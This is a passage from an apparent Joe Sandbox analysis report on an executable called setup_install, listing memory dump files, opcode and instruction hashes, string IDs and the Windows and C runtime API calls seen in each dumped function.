                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: memchrmemcpypthread_oncesetlocale
                                        • String ID: .$6
                                        • API String ID: 3643807795-4089497287
                                        • Opcode ID: 42651bb668afe974945c6c8e24532d68f7275f67bd62457f4fe85df8a72df5e4
                                        • Instruction ID: e3a3f30276567f323ef97ab1a2b1f8ec4e73b3d91036b87995926d52181019ae
                                        • Opcode Fuzzy Hash: 42651bb668afe974945c6c8e24532d68f7275f67bd62457f4fe85df8a72df5e4
                                        • Instruction Fuzzy Hash: 45D106B19083599FDB04DFA9C48059EBBF0FF88304F058A6EE8A4A7352D738D945CB95
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: lambda($}$CJ$CJ
                                        • API String ID: 0-3310585947
                                        • Opcode ID: 441eb3c19a75e4cd08fa971b4aa8a46ca7b7d5688c279342bd3ced6d264a10ab
                                        • Instruction ID: e4c685f68e36493c3de3eab20776ee6ad7733e9f6dbd5019a48f61e0c8180bf1
                                        • Opcode Fuzzy Hash: 441eb3c19a75e4cd08fa971b4aa8a46ca7b7d5688c279342bd3ced6d264a10ab
                                        • Instruction Fuzzy Hash: 19517D755082418BCB15CF28C4C43E97BE1AFA5304F1984BEECC98F38ADBB99885DB55
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: Byte$CharMultiWide$Lead_errno
                                        • String ID:
                                        • API String ID: 2766522060-0
                                        • Opcode ID: 3d110c38c04dedb10705c1fee61db960045614c58d8071325f48585bcbbfbc2a
                                        • Instruction ID: e1df8239732706b19f7a1152eb9ce1b6aa03ee6886cf15ccd66ca36cc3b23098
                                        • Opcode Fuzzy Hash: 3d110c38c04dedb10705c1fee61db960045614c58d8071325f48585bcbbfbc2a
                                        • Instruction Fuzzy Hash: 2B41F3B464D3408FE700DF29D48430ABFF4BF86314F11895DE8A887294D7B6D849DB92
                                        APIs
                                        • GetSystemTimeAsFileTime.KERNEL32 ref: 64948677
                                        • GetCurrentProcessId.KERNEL32 ref: 64948688
                                        • GetCurrentThreadId.KERNEL32 ref: 64948692
                                        • GetTickCount.KERNEL32 ref: 6494869A
                                        • QueryPerformanceCounter.KERNEL32 ref: 649486AB
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                        • String ID:
                                        • API String ID: 1445889803-0
                                        • Opcode ID: 39d630acf8a10e325bf8393a203a850d2fc39212499cae56763eb60316805918
                                        • Instruction ID: 3c0d69edf1267f57d29deabde56ffa946d75d51e232b331b8cb747edc03d7a15
                                        • Opcode Fuzzy Hash: 39d630acf8a10e325bf8393a203a850d2fc39212499cae56763eb60316805918
                                        • Instruction Fuzzy Hash: C711B4B998C3008FD780EF69D54820ABBF6FBC9348F55092DE58897314DB35E9558F82
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: __doserrno_errno
                                        • String ID:
                                        • API String ID: 921712934-0
                                        • Opcode ID: 499c63470cdbf89e2615ba6370be02355d33aa1b6f751f52ec25b2eb9db2ee8d
                                        • Instruction ID: 322398f837b7dda2bb270cf3427a6bf94588ac9faee4a2c8fc40a3c81f214a7f
                                        • Opcode Fuzzy Hash: 499c63470cdbf89e2615ba6370be02355d33aa1b6f751f52ec25b2eb9db2ee8d
                                        • Instruction Fuzzy Hash: 880156B38042115EE6116B18FC413DA7750F712324F4606B7E454972A0D3796CE68BD6
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: Process$CloseCurrentErrorHandleLastOpen_errno
                                        • String ID:
                                        • API String ID: 202612177-0
                                        • Opcode ID: 20f68f3ce55c5fb7dcab10714828cc171d1e0c4a8902d942e5e08d9ab4cb9166
                                        • Instruction ID: 4e16b630dc782374b909af75ff6b230731327e639b65ecd3076d44671a641f38
                                        • Opcode Fuzzy Hash: 20f68f3ce55c5fb7dcab10714828cc171d1e0c4a8902d942e5e08d9ab4cb9166
                                        • Instruction Fuzzy Hash: 29F0A97028C20A8FDB04BFB8D5C860EBFA9FB95304FA04A68D80586184EB70D450CF92
                                        APIs
                                        • pthread_mutex_lock.LIBWINPTHREAD-1 ref: 0048115F
                                        • pthread_mutex_unlock.LIBWINPTHREAD-1 ref: 004811C9
                                        • pthread_mutex_init.LIBWINPTHREAD-1 ref: 00481223
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: pthread_mutex_initpthread_mutex_lockpthread_mutex_unlock
                                        • String ID: TpJ
                                        • API String ID: 3657917519-767725062
                                        • Opcode ID: 1d2cf5396a49d6e0c984b100d03ce8c6fb4d8dc70b3b7b82a8aa4b5ff8a2f3ed
                                        • Instruction ID: 2a15342018b7d0688d85f47dc53d41f141b8bd8bf86cb253088d2a5c45086bb6
                                        • Opcode Fuzzy Hash: 1d2cf5396a49d6e0c984b100d03ce8c6fb4d8dc70b3b7b82a8aa4b5ff8a2f3ed
                                        • Instruction Fuzzy Hash: 07F1EA70604A018BCB147F72C48642EBAA2AF81748F025D3FE6C66B753DB3C95458BDE
                                        APIs
                                          • Part of subcall function 004806B0: pthread_once.LIBWINPTHREAD-1 ref: 004806C2
                                        • pthread_mutex_lock.LIBWINPTHREAD-1 ref: 0048288F
                                          • Part of subcall function 004271B0: strcmp.MSVCRT ref: 00427210
                                          • Part of subcall function 004271B0: strlen.MSVCRT ref: 00427250
                                          • Part of subcall function 004271B0: strlen.MSVCRT ref: 004272AD
                                          • Part of subcall function 0042A360: strlen.MSVCRT ref: 0042A373
                                          • Part of subcall function 0042A360: memcmp.MSVCRT ref: 0042A392
                                        • pthread_mutex_unlock.LIBWINPTHREAD-1 ref: 004828EB
                                        • setlocale.MSVCRT ref: 0048291E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: strlen$memcmppthread_mutex_lockpthread_mutex_unlockpthread_oncesetlocalestrcmp
                                        • String ID: lpJ
                                        • API String ID: 767575235-129645102
                                        • Opcode ID: f4e7ea7b920bb83a41b1ffb2eee811422c86285aa018dc66b472828e78b6400a
                                        • Instruction ID: 5b66a2720d131749c7af5220329f047ef30b166624f4ba10eca735f97d6b115f
                                        • Opcode Fuzzy Hash: f4e7ea7b920bb83a41b1ffb2eee811422c86285aa018dc66b472828e78b6400a
                                        • Instruction Fuzzy Hash: 53D1A8B0504A158BCB157F76C4C242EBBA2AF81708F025C3EE6C66B653DB3C95458BDE
                                        APIs
                                        • WaitForMultipleObjects.KERNEL32 ref: 64941FEE
                                        • WaitForSingleObject.KERNEL32 ref: 6494202F
                                        • ResetEvent.KERNEL32 ref: 649420E3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: Wait$EventMultipleObjectObjectsResetSingle
                                        • String ID: (
                                        • API String ID: 256776027-3887548279
                                        • Opcode ID: d3c9ae8f17cc32a79736f21f62a11dca631848ee47b092781cc3be202f4cd7ef
                                        • Instruction ID: 2acb6de1e463b6cf808bceca97d3fc2d5177aba1762545a1d5e36088cca3590f
                                        • Opcode Fuzzy Hash: d3c9ae8f17cc32a79736f21f62a11dca631848ee47b092781cc3be202f4cd7ef
                                        • Instruction Fuzzy Hash: 3F617D31A882059BEF149FB9D8847DEBBF5FB49395F00843ADA64D7240DB39C449CB52
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: QueryVirtual
                                        • String ID: @
                                        • API String ID: 1804819252-2766056989
                                        • Opcode ID: 0ad7313f9ead9221eb8c65789e7edec8cec91aa77f86457c8cd10a66682170ef
                                        • Instruction ID: d6fe0cab1458b832c70e86a52d2af5a9373d9665c523fa99ecfc29c9e32a706c
                                        • Opcode Fuzzy Hash: 0ad7313f9ead9221eb8c65789e7edec8cec91aa77f86457c8cd10a66682170ef
                                        • Instruction Fuzzy Hash: 3E416A729043059FC700DF69D9C461AFBE4FF84324F458A3EE8889B396E734A804CB99
                                        APIs
                                        • VirtualQuery.KERNEL32 ref: 0040CE2D
                                        • VirtualProtect.KERNEL32 ref: 0040CE87
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004AC0C8), ref: 0040CE94
                                          • Part of subcall function 004995D0: fwrite.MSVCRT ref: 004995FF
                                          • Part of subcall function 004995D0: vfprintf.MSVCRT ref: 0049961F
                                          • Part of subcall function 004995D0: abort.MSVCRT ref: 00499624
                                          • Part of subcall function 004995D0: abort.MSVCRT ref: 0049962C
                                          • Part of subcall function 004995D0: abort.MSVCRT ref: 00499631
                                          • Part of subcall function 004995D0: abort.MSVCRT ref: 00499636
                                          • Part of subcall function 004995D0: abort.MSVCRT ref: 0049963B
                                          • Part of subcall function 004995D0: abort.MSVCRT ref: 00499640
                                          • Part of subcall function 004995D0: abort.MSVCRT(0040FCCB), ref: 00499645
                                          • Part of subcall function 004995D0: abort.MSVCRT(0040FCCB), ref: 0049964A
                                          • Part of subcall function 004995D0: abort.MSVCRT(0040FCCB), ref: 0049964F
                                          • Part of subcall function 004995D0: abort.MSVCRT(0040FCCB), ref: 00499654
                                          • Part of subcall function 004995D0: abort.MSVCRT(0040FCCB), ref: 00499659
                                          • Part of subcall function 004995D0: abort.MSVCRT(0040FCCB), ref: 0049965E
                                          • Part of subcall function 004995D0: abort.MSVCRT(0040FCCB), ref: 00499663
                                          • Part of subcall function 004995D0: abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499668
                                          • Part of subcall function 004995D0: abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499670
                                          • Part of subcall function 004995D0: abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499675
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: abort$Virtual$ErrorLastProtectQueryfwritevfprintf
                                        • String ID: @
                                        • API String ID: 2966409508-2766056989
                                        • Opcode ID: fef63a2145809f198977734394b5a04657f8bfc594cc6e475c2525769e5c14dd
                                        • Instruction ID: 82fcf79b377032f850574e5fd164cfb7088b60912bd7c2e490d19bebdcc41ca2
                                        • Opcode Fuzzy Hash: fef63a2145809f198977734394b5a04657f8bfc594cc6e475c2525769e5c14dd
                                        • Instruction Fuzzy Hash: 01210EB6904741CFC700DF68D9C461AFBE0BF44314F058A6DD9989B296E738D505CB56
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: AddressProc$HandleModule
                                        • String ID: *iJ
                                        • API String ID: 667068680-3903676996
                                        • Opcode ID: a103b0ad2cda8f6748e037d8a22b12411a61a1b03717e81dae0606b8106ad7e8
                                        • Instruction ID: 3f432e2ca2cd4e79fa8fd2d104a7ebb07b7a99f005fe7627d3cc23087230de24
                                        • Opcode Fuzzy Hash: a103b0ad2cda8f6748e037d8a22b12411a61a1b03717e81dae0606b8106ad7e8
                                        • Instruction Fuzzy Hash: EBF062B0949310CB87007F786D8429B7EE4EA09350F06847FC889CB255E7798884CFAA
                                        APIs
                                        • GetModuleHandleA.KERNEL32(?,?,?,?,?,6494E16B), ref: 64941496
                                        • GetProcAddress.KERNEL32 ref: 649414B3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: AddressHandleModuleProc
                                        • String ID: _Jv_RegisterClasses$libgcj-13.dll
                                        • API String ID: 1646373207-3682238868
                                        • Opcode ID: 2ad844b0f089499faae888f4c950b0b5eafdb2ed79f281cb841ba6ca8c5237a2
                                        • Instruction ID: 2b1e24c8d12a008354ed845fb6be783c975b6751d250292565460297885cfa37
                                        • Opcode Fuzzy Hash: 2ad844b0f089499faae888f4c950b0b5eafdb2ed79f281cb841ba6ca8c5237a2
                                        • Instruction Fuzzy Hash: A6E01AB46883024BEB057F78C91A71A7FF9ABA3249F518428D885A6648FA30C4748B53
                                        APIs
                                        • GetModuleHandleA.KERNEL32(?,?,?,?,?,6494E16B), ref: 64941496
                                        • GetProcAddress.KERNEL32 ref: 649414B3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: AddressHandleModuleProc
                                        • String ID: _Jv_RegisterClasses$libgcj-13.dll
                                        • API String ID: 1646373207-3682238868
                                        • Opcode ID: 2a98aba964b574452d4d26b2423b2b56114db18673cc929abbcf86eb663cd14b
                                        • Instruction ID: bf6c873107a7f16b421c1ec91f88494b6e8bcfa71d81f45d3f39beecd13a3bca
                                        • Opcode Fuzzy Hash: 2a98aba964b574452d4d26b2423b2b56114db18673cc929abbcf86eb663cd14b
                                        • Instruction Fuzzy Hash: EBE0E6B45483014BD7057F78891A31E7EF99BE3145F518528CC8556648FA30C4758B53
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: atoisetlocalestrchr
                                        • String ID: .
